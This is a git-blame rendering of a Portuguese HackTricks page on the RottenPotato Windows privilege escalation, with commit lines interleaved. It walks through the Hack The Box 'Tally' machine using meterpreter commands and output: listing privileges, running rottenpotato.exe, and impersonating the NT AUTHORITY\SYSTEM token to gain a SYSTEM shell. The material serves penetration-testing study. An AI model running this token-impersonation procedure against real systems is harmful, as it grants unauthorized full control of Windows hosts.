Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-19 01:24:50 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/windows-local-privilege-escalation/rottenpotato.md

105 lines
4.8 KiB
Markdown
Raw Normal View History

GitBook: [#3195] No subject
2022-05-08 23:13:03 +00:00
# RottenPotato
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Outras formas de apoiar o HackTricks:
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
As informações nesta página foram extraídas [deste post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/)
Contas de serviço geralmente têm privilégios especiais (SeImpersonatePrivileges) e isso pode ser usado para escalar privilégios.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
[https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
Translated to Portuguese
2023-06-06 18:56:34 +00:00
Não entrarei em detalhes sobre como esse exploit funciona, o artigo acima explica muito melhor do que eu poderia.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Vamos verificar nossos privilégios com meterpreter:
GitBook: [#3195] No subject
2022-05-08 23:13:03 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
```
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Excelente, parece que temos os privilégios necessários para realizar o ataque. Vamos fazer o upload do `rottenpotato.exe`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
De volta à nossa sessão meterpreter, carregamos a extensão `incognito`.
GitBook: [#3195] No subject
2022-05-08 23:13:03 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Call rev2self if primary process token is SYSTEM
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah
Impersonation Tokens Available
========================================
No tokens available
```
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Podemos ver que atualmente não temos Tokens de Impersonation. Vamos executar o exploit Rotten Potato.
GitBook: [#3195] No subject
2022-05-08 23:13:03 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Call rev2self if primary process token is SYSTEM
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah
Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
```
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Precisamos rapidamente personificar o token ou ele desaparecerá.
GitBook: [#3195] No subject
2022-05-08 23:13:03 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Call rev2self if primary process token is SYSTEM
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Sucesso! Conseguimos nosso shell SYSTEM e podemos pegar o arquivo root.txt!
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
Outras formas de apoiar o HackTricks:
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica
2024-01-10 01:31:16 +00:00
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Reference in a new issue Copy permalink